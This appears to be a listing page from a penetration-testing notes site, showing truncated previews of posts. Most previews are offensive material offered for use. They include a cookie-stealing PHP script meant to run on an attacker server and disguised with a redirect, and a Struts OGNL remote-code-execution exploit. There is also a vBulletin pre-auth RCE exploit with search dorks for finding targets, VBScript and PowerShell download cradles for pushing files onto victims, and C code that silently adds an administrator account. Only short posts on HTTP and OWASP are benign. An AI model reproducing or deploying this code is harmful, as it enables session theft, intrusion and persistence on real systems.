Latest notes for PenTesting - MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

// Upload/Save this file on ATTACKER_SERVER cookiestealer.php //
// Change google.com to the same website that you are attacking, so that the victim can't detect it. //
// You can find the cookie in the same directory where you put this file, in a file named log.txt. //


<?php
header ('Location:https://google.com');

$cookies = $_GET["c&q...


Score: 0

By: unknowndevice64 2019-10-19 01:28:48

The two most common HTTP methods are: GET and POST.
What is HTTP?
The Hypertext Transfer Protocol (HTTP) is designed to enable communications between clients and servers.
HTTP works as a request-response protocol between a client and server.
A web browser may be the client, and an application on a computer that hosts a web site may be the serve...


Score: 0


#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import httplib
def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload +...


Score: 0


Set up the tunnel with this command:
ssh -D <your_ip>:<sock5_port> -f -C -q -N <user>@<server_ip>
Example:
ssh -D 192.168.64.64:6464 -f -C -q -N ud64@172.245.64.64
For local access remove IP:
ssh -D 6464 -f -C -q -N ud64@172.245.64.64

Explanation of arguments
-D: Tells SSH that we want a SOCKS tunnel on the specified por...


Score: 0


#!/usr/bin/python
#
# vBulletin 5.x 0day pre-auth RCE exploit
#
# This should work on all versions from 5.0.0 till 5.5.4
#
# Google Dorks:
# - site:*.vbulletin.net
# - "Powered by vBulletin Version 5.5.4"

import requests
import sys

if len(sys.argv) != 2:
    sys.exit("Usage: %s <URL to vBulletin>" % sys.ar...


Score: 0

By: ajayverma 2019-06-27 11:50:14

Recently (at the end of 2017), OWASP updated its Top 10 list. For the unfamiliar, let me briefly explain what that means: the industry standard of basic-web-security education has altered. Though it’s never been a complete security education, the OWASP Top Ten is where almost all standards for web-developer security education begin. So when it ch...


Score: 0


echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTI...


Score: 0


Usage: cscript wget.vbs http://[URL (including file)] [filename to save to]

On attacker machine:
copy file to transfer to: **/var/www**
start apache: **service apache2 start**



echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT...


Score: 0


Usage: echo "" | powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Make sure to change the values for $url and $file before sending the commands

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "[---URL (with filepath)-...


Score: 0


#include <stdlib.h>
int main()
{
    int i;
    int j;
    i = system("net user [---username---] [---password---] /add");
    j = system("net localgroup administrators [---username---] /add");
    return 0;
}
...


Score: 0